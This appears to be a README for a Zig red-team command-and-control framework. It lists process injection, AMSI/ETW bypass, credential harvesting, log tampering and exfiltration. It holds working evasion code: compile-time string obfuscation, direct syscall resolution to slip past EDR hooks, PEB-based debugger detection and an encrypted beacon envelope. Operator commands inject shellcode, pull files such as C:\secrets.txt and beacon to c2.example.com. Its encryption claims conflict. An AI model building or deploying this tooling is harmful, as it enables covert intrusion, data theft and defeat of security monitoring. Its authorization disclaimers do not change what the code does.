
ZigHound

Advanced red team framework in Zig. Reconnaissance with banner grabbing, stealth scanning (jitter + randomization), HTTP brute-force. C2 with XChaCha20-Poly1305 encryption, interactive shell, persistence (systemd/Registry). Post-exploitation PrivEsc audit, process injection, file exfiltration, tunneling.

Tech Stack

Zig, Red Team, C2, Exploitation, Reconnaissance, Malware Development, Stealth

Executive Summary

ZigHound pushes the boundaries of red team tooling by leveraging Zig's unique capabilities: compile-time code execution, cross-compilation simplicity, and C interoperability without the baggage. This framework provides operators with a lightweight, stealthy, and highly customizable platform for authorized penetration testing and adversary simulation.

Technical Architecture

Why Zig?

1. Compile-Time Code Generation

// Configuration baked into binary at compile time
const config = comptime blk: {
    var cfg = defaultConfig();
    cfg.c2_domain = obfuscateString("c2.example.com");
    cfg.beacon_interval = 300;
    break :blk cfg;
};

2. Zero Dependencies

  • No runtime linking
  • Single static binary
  • Minimal footprint (<500KB)
  • Reduced detection surface

3. Cross-Compilation

# Build for any target from any host
zig build -Dtarget=x86_64-windows-gnu
zig build -Dtarget=aarch64-linux-musl
zig build -Dtarget=x86_64-macos-none

Core Modules

1. C2 (Command & Control)

  • Protocols: HTTPS, DNS tunneling, ICMP covert channel
  • Encryption: AES-256-GCM with rotating keys
  • Jitter: Randomized beacon intervals (±30%)
  • Failover: Multiple C2 endpoints with priority

2. Agent

  • Injection: Process hollowing, APC injection, thread hijacking
  • Evasion: AMSI bypass, ETW patching, unhooking
  • Persistence: Registry run keys, scheduled tasks, WMI events
  • Discovery: System enumeration, network scanning, credential harvesting

3. Post-Exploitation

  • Privilege Escalation: Token impersonation, UAC bypass, kernel exploits
  • Lateral Movement: Pass-the-hash, Kerberoasting, DCOM/RPC
  • Data Exfiltration: Compressed, encrypted, chunked transfer
  • Cleanup: Artifact removal, log tampering, anti-forensics

Key Features

🎯 Stealth Capabilities

1. Syscall Direct Invocation

// Bypass user-mode hooks: resolve the syscall stub yourself instead of
// calling the (possibly hooked) ntdll export. resolveSyscall is the
// framework's resolver; only the pointer type is shown here.
// Zig 0.11 form: @ptrCast takes one argument and infers the result type
// from the declaration. NT calls on x86_64 use the Win64 ABI, which is
// callconv(.C) on that target, not Stdcall (an x86-only convention).
const windows = @import("std").os.windows;
const NtAllocateVirtualMemory: *const fn (ProcessHandle: windows.HANDLE, ...) callconv(.C) windows.NTSTATUS =
    @ptrCast(resolveSyscall("NtAllocateVirtualMemory"));

2. String Obfuscation

  • XOR encryption at compile time
  • Stack allocation (no .data section)
  • Dynamic decryption on use
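The three bullets above describe one mechanism; here it is end to end as an added example (not ZigHound's code), written against Zig 0.11 syntax. The key-stream derivation, the `Obfuscated`/`reveal` names and the placeholder domain are illustrative choices, not the project's implementation.

```zig
// Added example (not ZigHound code): comptime XOR string obfuscation as the
// bullets above describe, written against Zig 0.11 syntax. The key-stream
// derivation and the Obfuscated/reveal names are illustrative choices.
const std = @import("std");

/// Returns a type whose binary image contains only `data` (plaintext XOR key)
/// and `key`; the plaintext itself is never emitted into .rodata or .data.
fn Obfuscated(comptime plain: []const u8, comptime seed: u8) type {
    return struct {
        pub const len = plain.len;

        // Per-string key stream, generated entirely at compile time.
        const key: [len]u8 = blk: {
            var k: [len]u8 = undefined;
            var state: u8 = seed;
            for (0..len) |i| {
                state = state *% 31 +% 7; // small LCG step, constant-folded
                k[i] = state;
            }
            break :blk k;
        };

        // What actually lands in the binary.
        const data: [len]u8 = blk: {
            var d: [len]u8 = undefined;
            for (0..len) |i| d[i] = plain[i] ^ key[i];
            break :blk d;
        };

        /// Decrypts into a caller-supplied stack buffer at the point of use.
        /// The volatile reads stop the optimizer from folding `data ^ key`
        /// back into the plaintext constant, which would undo the scheme.
        pub fn reveal(out: *[len]u8) []u8 {
            const src: *const volatile [len]u8 = &data;
            const k: *const volatile [len]u8 = &key;
            for (0..len) |i| out[i] = src[i] ^ k[i];
            return out;
        }
    };
}

// Placeholder domain, as on the page; it never appears in clear in the
// compiled binary (check with `strings` on the output).
const C2Domain = Obfuscated("c2.example.com", 0x5a);

pub fn main() void {
    var buf: [C2Domain.len]u8 = undefined;
    const domain = C2Domain.reveal(&buf);
    std.debug.print("beacon target: {s}\n", .{domain});
    @memset(&buf, 0); // wipe the stack copy as soon as it has been used
}
```

The volatile reads are the part people forget: with both arrays comptime-known, LLVM is otherwise free to fold the XOR loop into a plain copy of the original string, which puts the plaintext straight back into `.rodata`. Build with `-Doptimize=ReleaseSmall` and run `strings` over the binary to confirm the domain is absent.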

3. Anti-Analysis

  • Debugger detection (PEB.BeingDebugged, NtGlobalFlag)
  • VM/sandbox detection (CPUID, timing checks)
  • Process enumeration (blacklisted tools)
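The two PEB fields named above, read directly rather than through an API that a user-mode hook could intercept, as an added example (not ZigHound's code) in Zig 0.11 syntax. It is Windows-only and `debuggerPresent` is an illustrative name.

```zig
// Added example (not ZigHound code): the PEB.BeingDebugged and NtGlobalFlag
// checks named above, Zig 0.11 syntax, Windows only.
const std = @import("std");
const builtin = @import("builtin");
const windows = std.os.windows;

/// True if a user-mode debugger is attached or the process was started
/// under one. Both fields come straight from the PEB, so no API call that
/// an EDR hook could intercept is made.
pub fn debuggerPresent() bool {
    if (builtin.os.tag != .windows) {
        return false; // the PEB does not exist off Windows
    } else {
        const peb = windows.peb();
        // Set by the kernel when a debugger attaches; this is the byte
        // IsDebuggerPresent() reads. Trivial to clear, hence the second check.
        if (peb.BeingDebugged != 0) return true;
        // Heap debug flags the loader sets when the process is *created* by a
        // debugger: FLG_HEAP_ENABLE_TAIL_CHECK (0x10) | FLG_HEAP_ENABLE_FREE_CHECK
        // (0x20) | FLG_HEAP_VALIDATE_PARAMETERS (0x40).
        const heap_debug_flags: u32 = 0x70;
        return (peb.NtGlobalFlag & heap_debug_flags) != 0;
    }
}

pub fn main() void {
    if (debuggerPresent()) {
        // A real agent would diverge quietly rather than announce itself.
        std.process.exit(0);
    }
    std.debug.print("no debugger observed\n", .{});
}
```

Neither field catches a debugger that attaches after the check has run or one that patches the PEB first, which is why the page pairs these with timing and CPUID checks.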

📡 Communication Security

Protocol Stack

Application: Custom binary protocol
Encryption: AES-256-GCM + ECDH key exchange
Transport: HTTPS / DNS / ICMP
Obfuscation: Domain fronting, CDN routing
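The page names XChaCha20-Poly1305 in the summary and AES-256-GCM here; both are AEADs with the same interface in Zig's standard library, so one envelope serves either. The following is an added example (not ZigHound's wire format) in Zig 0.11 syntax: the frame layout (nonce || ciphertext || tag, with a 4-byte agent id as associated data) and the `Envelope`/`seal`/`open` names are illustrative assumptions.

```zig
// Added example (not ZigHound code): one beacon-frame envelope that works
// with either AEAD the page names, via Zig 0.11's std.crypto. The frame
// layout (nonce || ciphertext || tag, 4-byte agent id as associated data)
// and the Envelope/seal/open names are illustrative, not the project's.
const std = @import("std");
const XChaCha20Poly1305 = std.crypto.aead.chacha_poly.XChaCha20Poly1305;
const Aes256Gcm = std.crypto.aead.aes_gcm.Aes256Gcm;

fn Envelope(comptime Aead: type) type {
    return struct {
        pub const key_len = Aead.key_length;
        pub const nonce_len = Aead.nonce_length; // 24 for XChaCha, 12 for AES-GCM
        pub const tag_len = Aead.tag_length;

        pub fn sealedSize(plain_len: usize) usize {
            return nonce_len + plain_len + tag_len;
        }

        /// `out` must be exactly sealedSize(plain.len) bytes. A fresh random
        /// nonce is drawn per frame; with a 96-bit nonce (AES-GCM) that is
        /// only safe for a bounded number of frames per key, which is the
        /// real reason to rotate keys or prefer the 192-bit XChaCha nonce.
        pub fn seal(out: []u8, plain: []const u8, agent_id: [4]u8, key: [key_len]u8) void {
            std.debug.assert(out.len == sealedSize(plain.len));
            const nonce = out[0..nonce_len];
            std.crypto.random.bytes(nonce);
            const ct = out[nonce_len .. nonce_len + plain.len];
            const tag = out[nonce_len + plain.len ..][0..tag_len];
            Aead.encrypt(ct, tag, plain, &agent_id, nonce.*, key);
        }

        /// Authenticates and decrypts a frame into `out`; any tampering with
        /// nonce, ciphertext, tag or agent id fails with AuthenticationFailed.
        pub fn open(out: []u8, frame: []const u8, agent_id: [4]u8, key: [key_len]u8) ![]u8 {
            if (frame.len < nonce_len + tag_len) return error.FrameTooShort;
            const plain_len = frame.len - nonce_len - tag_len;
            if (out.len < plain_len) return error.BufferTooSmall;
            const nonce = frame[0..nonce_len];
            const ct = frame[nonce_len .. nonce_len + plain_len];
            const tag = frame[nonce_len + plain_len ..][0..tag_len];
            try Aead.decrypt(out[0..plain_len], ct, tag.*, &agent_id, nonce.*, key);
            return out[0..plain_len];
        }
    };
}

pub fn main() !void {
    // Swap in Envelope(Aes256Gcm) to get the AES-256-GCM variant.
    const Frame = Envelope(XChaCha20Poly1305);

    // Constructed sample inputs: a random session key and a fixed agent id.
    var key: [Frame.key_len]u8 = undefined;
    std.crypto.random.bytes(&key);
    const agent: [4]u8 = .{ 0xde, 0xad, 0xbe, 0xef };
    const task = "shell whoami";

    var frame: [Frame.sealedSize(task.len)]u8 = undefined;
    Frame.seal(&frame, task, agent, key);

    var plain: [task.len]u8 = undefined;
    const got = try Frame.open(&plain, &frame, agent, key);
    std.debug.print("decrypted task: {s}\n", .{got});

    // The same frame replayed under another agent id must not authenticate.
    const other_agent: [4]u8 = .{ 0, 0, 0, 0 };
    if (Frame.open(&plain, &frame, other_agent, key)) |_| {
        unreachable;
    } else |err| {
        std.debug.print("replay under other id rejected: {s}\n", .{@errorName(err)});
    }
}
```

Binding the agent id as associated data is what makes "rotating keys" meaningful per agent: a frame captured from one session cannot be replayed into another even if the key is shared, and the ECDH exchange listed above only has to deliver the per-session key, not the framing.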

Beacon Profile

{
  "interval": 300,
  "jitter": 0.3,
  "user_agent": "Mozilla/5.0...",
  "headers": {
    "X-Custom-Header": "legitimate-looking-value"
  }
}

Installation

# Prerequisites
# - Zig 0.11+ 
# - Git

# Clone repository
git clone https://github.com/ind4skylivey/ZigHound.git
cd ZigHound

# Build all components
zig build -Doptimize=ReleaseSafe   # Zig 0.11+ syntax; the old -Drelease-* flags were removed

# Build specific target
zig build -Dtarget=x86_64-windows-gnu -Doptimize=ReleaseSmall

# Output binaries
# - zig-out/bin/agent
# - zig-out/bin/c2-server
# - zig-out/bin/operator-cli

Usage

1. Start C2 Server

./c2-server --config c2-config.toml

2. Generate Agent

./operator-cli generate \
  --c2 https://c2.example.com \
  --format exe \
  --output agent.exe

3. Deploy Agent

# Standard execution
./agent.exe

# In-memory execution (no disk artifact)
./operator-cli inject --pid 1234 --payload shellcode.bin

4. Operator CLI

# List active sessions
./operator-cli sessions

# Interact with session
./operator-cli interact --session 1

# Execute command
>>> shell whoami
>>> upload file.txt C:\Windows\Temp\
>>> download C:\secrets.txt .
>>> migrate --pid 5678

Configuration

# c2-config.toml
[server]
bind_address = "0.0.0.0:443"
certificate = "/path/to/cert.pem"
private_key = "/path/to/key.pem"

[beacon]
interval = 300
jitter = 0.3
max_retries = 5

[obfuscation]
enabled = true
technique = "domain_fronting"
# Verify the front still works before relying on it: the major CDNs
# (CloudFront, Google) have blocked classic domain fronting since 2018.
front_domain = "cdn.cloudfront.net"

[logging]
level = "info"
file = "/var/log/zighound/c2.log"

OPSEC Considerations

Detection Evasion

  • Signature Evasion: Polymorphic code generation
  • Behavioral Evasion: Living-off-the-land techniques
  • Network Evasion: Protocol mimicry, legitimate domains

โš ๏ธ WARNING: This tool is for authorized security testing only.

  • Always have written authorization
  • Respect scope boundaries
  • Follow responsible disclosure
  • Comply with local laws

Roadmap

  • v1.0: Stable C2 protocol
  • v1.5: macOS and Linux agents
  • v2.0: mTLS authentication
  • v2.5: Blockchain-based C2
  • v3.0: AI-powered evasion

Research and Development

This project contributes to:

  • Adversary simulation methodologies
  • EDR/AV evasion techniques
  • Secure C2 protocol design
  • Memory-safe offensive tooling

License

GPL-3.0 - For research and authorized testing only

โš ๏ธ Disclaimer: Use only on systems you own or have explicit permission to test.
